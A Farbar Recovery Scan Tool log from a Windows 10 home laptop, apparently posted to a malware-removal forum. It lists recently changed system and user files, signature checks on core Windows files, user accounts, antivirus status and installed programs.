2017-01-10 22:47 - 2016-12-21 02:06 - 06285312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2017-01-10 22:47 - 2016-12-21 02:06 - 00310784 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncSettings.dll
2017-01-10 22:47 - 2016-12-21 02:06 - 00260608 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
2017-01-10 22:47 - 2016-12-21 02:06 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
2017-01-10 22:47 - 2016-12-21 02:05 - 00425984 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2017-01-10 22:47 - 2016-12-21 02:05 - 00049152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Shell.dll
2017-01-10 22:47 - 2016-12-21 02:01 - 09131008 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2017-01-10 22:47 - 2016-12-21 01:59 - 01908224 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2017-01-10 22:47 - 2016-12-21 01:56 - 00947712 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVP9DEC.dll
2017-01-10 22:47 - 2016-12-21 01:56 - 00936960 _____ (Microsoft Corporation) C:\WINDOWS\system32\MCRecvSrc.dll
2017-01-10 22:47 - 2016-12-21 01:55 - 08129536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2017-01-10 22:47 - 2016-12-21 01:55 - 04749312 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2017-01-10 22:47 - 2016-12-21 01:53 - 06664192 _____ (Microsoft Corporation) C:\WINDOWS\system32\mspaint.exe
2017-01-10 22:47 - 2016-12-21 01:51 - 08075776 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2017-01-10 22:47 - 2016-12-21 01:49 - 04149248 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
2017-01-10 22:47 - 2016-12-21 01:49 - 02691072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2017-01-10 22:47 - 2016-12-21 01:49 - 01062912 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2017-01-10 22:47 - 2016-12-21 01:47 - 01121280 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2017-01-10 22:47 - 2016-12-14 00:34 - 02482280 _____ (Microsoft Corporation) C:\WINDOWS\system32\msmpeg2vdec.dll
2017-01-10 22:47 - 2016-12-14 00:23 - 00404832 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2017-01-10 22:47 - 2016-12-14 00:19 - 00584544 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe
2017-01-10 22:47 - 2016-12-14 00:17 - 00319288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64.dll
2017-01-10 22:47 - 2016-12-14 00:14 - 01694712 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll
2017-01-10 22:47 - 2016-12-13 23:46 - 00206848 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2017-01-10 22:47 - 2016-12-13 23:43 - 00201728 _____ (Microsoft Corporation) C:\WINDOWS\system32\ScDeviceEnum.dll
2017-01-10 22:47 - 2016-12-13 23:42 - 00352768 _____ (Microsoft Corporation) C:\WINDOWS\system32\cloudAP.dll
2017-01-10 22:47 - 2016-12-13 23:42 - 00236544 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinSCard.dll
2017-01-10 22:47 - 2016-12-13 23:40 - 00193536 _____ (Microsoft Corporation) C:\WINDOWS\system32\certprop.dll
2017-01-10 22:47 - 2016-12-13 23:39 - 00837632 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbiosrvc.dll
2017-01-10 22:47 - 2016-12-13 23:39 - 00290816 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2017-01-10 22:47 - 2016-12-13 23:37 - 00090112 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatepolicy.dll
2017-01-10 22:47 - 2016-12-13 23:36 - 01002496 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll
2017-01-10 22:47 - 2016-12-13 23:36 - 00539648 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2017-01-10 22:47 - 2016-12-13 23:26 - 00932864 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2017-01-10 22:47 - 2016-12-13 23:26 - 00869888 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2017-01-10 22:47 - 2016-12-13 23:25 - 02009600 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRHInproc.dll
2017-01-10 22:47 - 2016-12-13 23:24 - 00673792 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2017-01-10 22:47 - 2016-12-13 23:23 - 03134976 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcore.dll
2017-01-10 22:47 - 2016-12-13 23:22 - 02317824 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2017-01-10 22:47 - 2016-12-13 23:22 - 01513472 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2017-01-10 22:47 - 2016-12-13 23:22 - 00391168 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2017-01-10 22:47 - 2016-12-13 23:21 - 03616768 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2017-01-10 22:46 - 2016-12-21 03:08 - 00245600 _____ (Microsoft Corporation) C:\WINDOWS\system32\offlinesam.dll
2017-01-10 22:46 - 2016-12-21 02:46 - 00624048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2017-01-10 22:46 - 2016-12-21 02:42 - 00241504 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll
2017-01-10 22:46 - 2016-12-21 02:15 - 22563840 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2017-01-10 22:46 - 2016-12-21 02:05 - 00261632 _____ (Microsoft Corporation) C:\WINDOWS\system32\indexeddbserver.dll
2017-01-10 22:46 - 2016-12-21 02:00 - 00440320 _____ (Microsoft Corporation) C:\WINDOWS\system32\fhcfg.dll
2017-01-10 22:46 - 2016-12-21 01:59 - 00883712 _____ (Microsoft Corporation) C:\WINDOWS\system32\samsrv.dll
2017-01-10 22:46 - 2016-12-21 01:58 - 23678464 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-01-10 22:46 - 2016-12-21 01:57 - 00462336 _____ (Microsoft Corporation) C:\WINDOWS\system32\fhsettingsprovider.dll
2017-01-10 22:46 - 2016-12-21 01:53 - 04474368 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2017-01-10 22:46 - 2016-12-21 01:51 - 05611008 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll
2017-01-10 22:46 - 2016-12-21 01:50 - 01490432 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2017-01-10 22:46 - 2016-12-13 23:48 - 01631232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll
2017-01-10 22:46 - 2016-12-13 23:42 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.UI.Logon.ProxyStub.dll
2017-01-10 22:46 - 2016-12-13 23:41 - 00223744 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2017-01-10 22:46 - 2016-12-13 23:40 - 00324096 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2017-01-10 22:46 - 2016-12-13 23:40 - 00266752 _____ (Microsoft Corporation) C:\WINDOWS\system32\ConsoleLogon.dll
2017-01-10 22:46 - 2016-12-13 23:39 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.CredDialogController.dll
2017-01-10 22:46 - 2016-12-13 23:38 - 17188864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2017-01-10 22:46 - 2016-12-13 23:35 - 00600576 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptui.dll
2017-01-10 22:46 - 2016-12-13 23:24 - 01005568 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3D12.dll
2017-01-10 22:46 - 2016-12-13 23:23 - 01231872 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2017-01-10 22:46 - 2016-12-13 23:22 - 00707584 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
2017-01-10 22:45 - 2016-12-21 02:37 - 00455520 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
2017-01-10 22:45 - 2016-12-21 01:54 - 05511680 _____ (Microsoft Corporation) C:\WINDOWS\system32\aclui.dll
2017-01-10 22:45 - 2016-12-21 01:53 - 01692672 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2017-01-10 22:45 - 2016-12-21 01:51 - 02275840 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2017-01-10 22:45 - 2016-12-14 00:41 - 01235296 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2017-01-10 22:45 - 2016-12-14 00:41 - 00590960 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2017-01-10 22:45 - 2016-12-14 00:33 - 01356864 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipUp.exe
2017-01-10 22:45 - 2016-12-14 00:18 - 00715104 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vhdmp.sys
2017-01-10 22:45 - 2016-12-14 00:18 - 00335712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pci.sys
2017-01-10 22:45 - 2016-12-14 00:14 - 00418952 _____ (Microsoft Corporation) C:\WINDOWS\system32\AUDIOKSE.dll
2017-01-10 22:45 - 2016-12-14 00:14 - 00089416 _____ (Microsoft Corporation) C:\WINDOWS\system32\remoteaudioendpoint.dll
2017-01-10 22:45 - 2016-12-13 23:38 - 00295424 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudBackupSettings.dll
2017-01-10 22:45 - 2016-11-02 06:00 - 00534096 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEng.dll
2017-01-10 22:45 - 2016-11-02 05:28 - 00324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.LockScreen.dll
2017-01-10 22:45 - 2016-11-02 05:22 - 00337920 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2017-01-10 22:45 - 2016-11-02 05:21 - 00942080 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2017-01-10 17:38 - 2017-02-01 18:26 - 00176064 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMChameleon.sys
2017-01-10 17:37 - 2017-02-01 21:20 - 00110536 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\farflt.sys
2017-01-10 17:37 - 2017-02-01 21:20 - 00091584 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mwac.sys
2017-01-10 17:37 - 2017-01-31 23:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2017-01-10 17:37 - 2017-01-20 07:47 - 00077416 _____ C:\WINDOWS\system32\Drivers\mbae64.sys
2017-01-10 17:37 - 2017-01-10 17:37 - 00001919 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2017-01-10 17:37 - 2017-01-10 17:37 - 00000000 ____D C:\Program Files\Malwarebytes
2017-01-10 08:16 - 2017-01-31 15:36 - 00000000 ____D C:\Users\Joseph\Desktop\Marina
2017-01-08 19:56 - 2017-01-31 20:39 - 00000000 ___RD C:\Users\Joseph\Creative Cloud Files
2017-01-08 19:53 - 2017-01-08 19:53 - 00000000 ____D C:\Users\Joseph\AppData\Local\CEF
2017-01-08 19:49 - 2017-01-08 19:49 - 00804440 _____ (Adobe Systems Incorporated) C:\Users\Joseph\Downloads\CreativeCloudSet-Up (1).exe
2017-01-06 16:13 - 2017-01-06 16:13 - 00000000 ____D C:\Program Files\Common Files\Intel
2017-01-06 16:13 - 2017-01-06 16:13 - 00000000 ____D C:\Program Files (x86)\Cisco
2017-01-04 16:04 - 2017-01-04 16:04 - 00313276 _____ C:\Users\Joseph\Downloads\reciept2.pdf
2017-01-04 16:04 - 2017-01-04 16:04 - 00273789 _____ C:\Users\Joseph\Downloads\reciept1.pdf
2017-01-03 19:19 - 2017-01-24 21:11 - 00000000 ____D C:\Users\Joseph\Desktop\Joe
2017-01-02 16:12 - 2017-02-01 20:58 - 00093053 _____ C:\Users\Joseph\Desktop\Annual Budget - 2017.xlsx
2017-01-02 16:12 - 2017-01-31 23:03 - 00087912 _____ C:\Users\Joseph\Desktop\A79BE330
==================== One Month Modified files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2017-02-01 21:29 - 2016-09-23 17:44 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Skype
2017-02-01 21:25 - 2016-07-16 01:04 - 00032768 _____ C:\WINDOWS\system32\config\ELAM
2017-02-01 21:19 - 2016-09-22 19:47 - 00043968 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2017-02-01 21:18 - 2016-09-29 09:24 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-02-01 21:18 - 2016-09-29 08:58 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2017-02-01 21:18 - 2016-09-22 19:48 - 00251848 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2017-02-01 21:18 - 2016-09-22 19:41 - 00000000 __SHD C:\Users\Joseph\IntelGraphicsProfiles
2017-02-01 21:17 - 2016-09-29 09:03 - 00000000 ____D C:\Users\Joseph
2017-02-01 21:17 - 2016-07-16 01:04 - 00524288 _____ C:\WINDOWS\system32\config\BBI
2017-02-01 20:56 - 2016-09-29 08:55 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2017-02-01 19:33 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\NDF
2017-02-01 17:43 - 2016-07-16 06:47 - 00000000 ___HD C:\Program Files\WindowsApps
2017-02-01 17:43 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\AppReadiness
2017-02-01 17:17 - 2016-09-29 09:03 - 01320142 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-02-01 08:53 - 2016-10-29 21:04 - 00000000 ____D C:\Users\Joseph\AppData\Local\Adobe
2017-02-01 08:45 - 2016-07-16 06:45 - 00000000 ____D C:\WINDOWS\INF
2017-01-31 23:31 - 2016-10-18 20:11 - 00000000 ____D C:\Users\Joseph\AppData\Local\ElevatedDiagnostics
2017-01-31 23:05 - 2016-09-23 11:59 - 00000368 _____ C:\WINDOWS\Tasks\HPCeeScheduleForJoseph.job
2017-01-31 21:05 - 2016-09-29 09:23 - 00003264 _____ C:\WINDOWS\System32\Tasks\HPCeeScheduleForJoseph
2017-01-31 20:50 - 2016-10-09 20:00 - 00000000 ____D C:\Program Files (x86)\ShopTracker
2017-01-31 20:39 - 2016-10-29 21:14 - 00000000 ____D C:\ProgramData\boost_interprocess
2017-01-30 21:00 - 2016-10-09 20:01 - 00000000 ____D C:\Users\Joseph\AmazonMeter
2017-01-28 18:25 - 2016-10-01 10:34 - 00000000 ____D C:\Users\Joseph\Desktop\Bank School
2017-01-25 00:38 - 2016-07-16 06:36 - 00000000 ____D C:\WINDOWS\CbsTemp
2017-01-21 21:06 - 2016-09-29 08:55 - 00357720 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-01-21 20:43 - 2015-10-30 01:28 - 00000000 ____D C:\Users\Default.migrated
2017-01-21 09:20 - 2016-09-23 17:44 - 00000000 ____D C:\ProgramData\Skype
2017-01-20 18:50 - 2016-12-15 07:50 - 00003292 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task v2
2017-01-20 18:49 - 2016-09-22 19:45 - 00002377 _____ C:\Users\Joseph\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-01-20 18:49 - 2016-09-22 19:45 - 00000000 ___RD C:\Users\Joseph\OneDrive
2017-01-19 18:39 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\ELAMBKUP
2017-01-18 22:54 - 2016-09-28 12:54 - 00000000 ____D C:\Users\Joseph\Documents\UserTesting
2017-01-18 22:27 - 2016-09-22 20:21 - 00000000 ____D C:\Users\Joseph\AppData\Local\UserTestingPlugin
2017-01-15 15:52 - 2016-11-09 10:50 - 00000000 ____D C:\Users\Joseph\Documents\TurboTax
2017-01-15 15:45 - 2016-11-09 10:48 - 00000479 _____ C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
2017-01-15 15:30 - 2016-11-09 10:49 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Intuit
2017-01-15 15:30 - 2016-11-09 10:46 - 00000000 ____D C:\Program Files (x86)\TurboTax
2017-01-15 14:07 - 2016-07-16 06:47 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2017-01-15 14:05 - 2016-04-01 13:57 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
2017-01-13 19:46 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\LiveKernelReports
2017-01-13 15:56 - 2016-09-29 08:59 - 00168695 _____ C:\WINDOWS\system32\Drivers\rtkhdasetting.zip
2017-01-13 15:56 - 2016-09-29 08:59 - 00002081 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\B&O Play Audio Control.lnk
2017-01-13 15:56 - 2016-09-29 08:59 - 00000000 ____D C:\WINDOWS\SysWOW64\RTCOM
2017-01-13 15:56 - 2016-08-06 13:49 - 00000000 ___HD C:\Program Files (x86)\Temp
2017-01-13 15:53 - 2016-08-06 13:49 - 05523456 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\Drivers\RTKVHD64.sys
2017-01-13 15:53 - 2016-08-06 13:49 - 03503048 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtkApi64.dll
2017-01-13 15:53 - 2016-08-06 13:49 - 03201376 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RltkAPO64.dll
2017-01-13 15:53 - 2016-08-06 13:49 - 02995000 _____ (DTS, Inc.) C:\WINDOWS\system32\slcnt64.dll
2017-01-13 15:53 - 2016-08-06 13:49 - 02839520 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\RtlExUpd.dll
2017-01-13 15:53 - 2016-08-06 13:49 - 00192976 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtkCfg64.dll
2017-01-13 15:53 - 2016-08-06 13:49 - 00023688 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtkCoLDR64.dll
2017-01-13 15:53 - 2016-04-01 13:31 - 00000000 ____D C:\SWSetup
2017-01-12 11:14 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\rescache
2017-01-11 00:22 - 2015-11-02 13:02 - 00000000 __RHD C:\Users\Public\AccountPictures
2017-01-11 00:16 - 2016-07-16 06:47 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2017-01-11 00:16 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2017-01-11 00:16 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\oobe
2017-01-11 00:16 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\ShellExperiences
2017-01-11 00:16 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\Provisioning
2017-01-10 23:28 - 2016-09-23 16:25 - 00000000 ____D C:\WINDOWS\system32\MRT
2017-01-10 23:25 - 2016-09-23 16:25 - 135657872 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-01-10 17:37 - 2016-09-22 19:47 - 00000000 ____D C:\ProgramData\Malwarebytes
2017-01-08 21:19 - 2016-09-22 19:41 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Adobe
2017-01-08 20:09 - 2016-10-29 21:27 - 00000000 ____D C:\Program Files\Adobe
2017-01-08 20:02 - 2016-10-29 21:33 - 00000000 ____D C:\ProgramData\regid.1986-12.com.adobe
2017-01-08 19:54 - 2016-10-29 21:14 - 00000000 __RHD C:\Users\Joseph\[email protected] Creative Cloud Files
2017-01-08 19:52 - 2016-10-29 21:10 - 00001309 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk
2017-01-08 19:52 - 2016-10-29 21:10 - 00001297 _____ C:\Users\Public\Desktop\Adobe Creative Cloud.lnk
2017-01-08 19:49 - 2016-09-22 19:41 - 00000000 ____D C:\Users\Joseph\AppData\Local\VirtualStore
2017-01-06 16:13 - 2016-09-29 08:57 - 00000000 ____D C:\Program Files (x86)\Intel
2017-01-06 16:13 - 2016-09-22 19:54 - 00000000 ____D C:\ProgramData\Intel
2017-01-06 16:11 - 2016-09-29 08:58 - 00000000 ____D C:\Program Files\Intel
2017-01-02 18:29 - 2016-10-02 22:40 - 00046599 _____ C:\Users\Joseph\Desktop\Expense Tracking.xlsx
==================== Files in the root of some directories =======
2017-01-31 23:27 - 2017-01-31 23:27 - 0000017 _____ () C:\Users\Joseph\AppData\Local\resmon.resmoncfg
2017-02-01 08:27 - 2017-02-01 08:27 - 0047353 _____ () C:\ProgramData\agent.1485955633.bdinstall.bin
2016-11-30 08:18 - 2016-11-30 08:18 - 0000057 _____ () C:\ProgramData\Ament.ini
2017-02-01 08:47 - 2017-02-01 08:47 - 0403991 _____ () C:\ProgramData\cl.1485956260.bdinstall.bin
2017-02-01 08:52 - 2017-02-01 08:52 - 0056949 _____ () C:\ProgramData\dm.1485956857.bdinstall.bin
2017-02-01 16:52 - 2017-02-01 16:52 - 0040137 _____ () C:\ProgramData\dm.1485985887.bdinstall.bin
2016-11-09 10:48 - 2017-01-15 15:45 - 0000479 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
==================== Bamital & volsnap ======================
(There is no automatic fix for files that do not pass verification.)
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
LastRegBack: 2017-01-23 10:44
==================== End of FRST.txt ===========================
Member
addition:
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 29-01-2017
Ran by Joseph (01-02-2017 21:32:05)
Running from C:\Users\Joseph\Downloads
Windows 10 Home Version 1607 (X64) (2016-09-29 14:26:58)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-2731509489-3924948741-1415746157-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-2731509489-3924948741-1415746157-503 - Limited - Disabled)
Guest (S-1-5-21-2731509489-3924948741-1415746157-501 - Limited - Disabled)
Joseph (S-1-5-21-2731509489-3924948741-1415746157-1001 - Administrator - Enabled) => C:\Users\Joseph
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Bitdefender Antivirus (Enabled - Up to date) {3FB17364-4FCC-0FA7-6BBF-973897395371}
AS: Bitdefender Antispyware (Enabled - Up to date) {84D09280-69F6-0029-510F-AC4AECBE19CC}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Bitdefender Firewall (Enabled) {078AF241-05A3-0EFF-40E0-3E0D69EA140A}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
12 Labours of Hercules III: Girl Power (x32 Version: 3.0.2.118 - WildTangent) Hidden
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.9.5.353 - Adobe Systems Incorporated)
Adobe Lightroom (HKLM-x32\...\{8048A5DF-8A70-5BE1-954B-E0FDE1BD0D0D}) (Version: 6.8 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.2 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.2.5.195 - Adobe Systems, Inc.)
Awakening: The Dreamless Castle (x32 Version: 3.0.2.51 - WildTangent) Hidden
Azkend 2: The World Beneath (x32 Version: 2.2.0.98 - WildTangent) Hidden
Barn Yarn Collector's Edition (x32 Version: 3.0.2.48 - WildTangent) Hidden
Bitdefender Agent (HKLM\...\Bitdefender Agent) (Version: 21.0.21.970 - Bitdefender)
Bitdefender Device Management (HKLM\...\Bitdefender Device Management) (Version: 21.0.23.1101 - Bitdefender)
Bitdefender Total Security 2017 (HKLM\...\Bitdefender) (Version: 21.0.23.1101 - Bitdefender)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Citrix Receiver 4.5 (HKLM-x32\...\CitrixOnlinePluginPackWeb) (Version: 14.5.0.10018 - Citrix Systems, Inc.)
CyberLink Power Media Player 14 (HKLM-x32\...\{32C8E300-BDB4-4398-92C2-E9B7D8A233DB}) (Version: 14.0.4.6527 - CyberLink Corp.)
CyberLink PowerDirector 12 (HKLM-x32\...\InstallShield_{E1646825-D391-42A0-93AA-27FA810DA093}) (Version: 12.0.6.4925 - CyberLink Corp.)
CyberLink PowerDirector 12 (Version: 12.0.6.4925 - CyberLink Corp.) Hidden
Delicious: Emily's Wonder Wedding Premium Edition (x32 Version: 3.0.2.59 - WildTangent) Hidden
DisableMSDefender (Version: 1.0.0 - Hewlett-Packard Company) Hidden
Dropbox 25 GB (HKLM-x32\...\{736A97C6-8766-3699-84A9-71736C5E0CE3}) (Version: 3.1.11.0 - Dropbox, Inc.)
Dropbox Update Helper (x32 Version: 1.3.59.1 - Dropbox, Inc.) Hidden
Energy Star (HKLM\...\{5CB22648-35F8-41BC-9C35-1E41FE6E12A5}) (Version: 1.1.1 - HP Inc.)
Entwined: The Perfect Murder (x32 Version: 3.0.2.59 - WildTangent) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 55.0.2883.87 - Google Inc.)
Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden
Green City: Go South (x32 Version: 3.0.2.59 - WildTangent) Hidden
Home Makeover (x32 Version: 3.0.2.59 - WildTangent) Hidden
Hoyle Illusions Mahjongg (x32 Version: 3.0.2.59 - WildTangent) Hidden
HP 3D DriveGuard (HKLM-x32\...\{E8D0E2B8-B64B-44BC-8E01-00DDACBDF78A}) (Version: 6.0.28.1 - Hewlett-Packard Company)
HP CoolSense (HKLM-x32\...\{0C723C74-62DF-4B35-9490-A207546D866D}) (Version: 2.21.4 - HP Inc.)
HP Documentation (HKLM\...\HP_Documentation) (Version: 1.0.0.1 - HP Inc.)
HP ePrint SW (HKLM-x32\...\{88970959-baf7-4864-a39a-69a58e8ae5cf}) (Version: 5.0.18701 - HP)
HP Photosmart 6520 series Basic Device Software (HKLM\...\{1151BCF8-3246-4E34-9C17-22E66318C41C}) (Version: 28.0.1315.0 - Hewlett-Packard Co.)
HP Photosmart 6520 series Help (HKLM-x32\...\{D3293275-1002-41F5-BC37-099B4251FF5B}) (Version: 28.0.0 - Hewlett Packard)
HP Photosmart 6520 series Product Improvement Study (HKLM\...\{F144E07C-4019-4092-BE25-B57819C97D2F}) (Version: 28.0.1315.0 - Hewlett-Packard Co.)
HP Registration Service (HKLM\...\{D1E8F2D7-7794-4245-B286-87ED86C1893C}) (Version: 1.2.8318.5320 - Hewlett-Packard)
HP Support Assistant (HKLM-x32\...\{78E2C850-ADA6-420D-BA35-2F4A9BE733CC}) (Version: 8.3.50.9 - HP)
HP Support Solutions Framework (HKLM-x32\...\{5F084DD8-AF2C-4004-9C92-820C32E4BD55}) (Version: 12.5.32.203 - HP)
HP Sure Connect (HKLM-x32\...\{6468C4A5-E47E-405F-B675-A70A70983EA6}) (Version: 1.0.0.27 - HP Inc.)
HP System Event Utility (HKLM-x32\...\{09D0DB68-90EA-4015-983E-A0BD777D5A02}) (Version: 1.4.10 - HP Inc.)
HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
HP Welcome (HKLM\...\HPWelcome) (Version: 1.0 - HP Inc.)
HP Wireless Button Driver (HKLM-x32\...\{AF4C5F64-4E6A-438B-9832-8BDEE0E7B43D}) (Version: 1.1.17.1 - HP)
IGT Slots Fire Rubies (x32 Version: 3.0.2.59 - WildTangent) Hidden
Imperial Island: Birth of an Empire (x32 Version: 3.0.2.59 - WildTangent) Hidden
Intel® Chipset Device Software (x32 Version: 10.1.1.9 - Intel® Corporation) Hidden
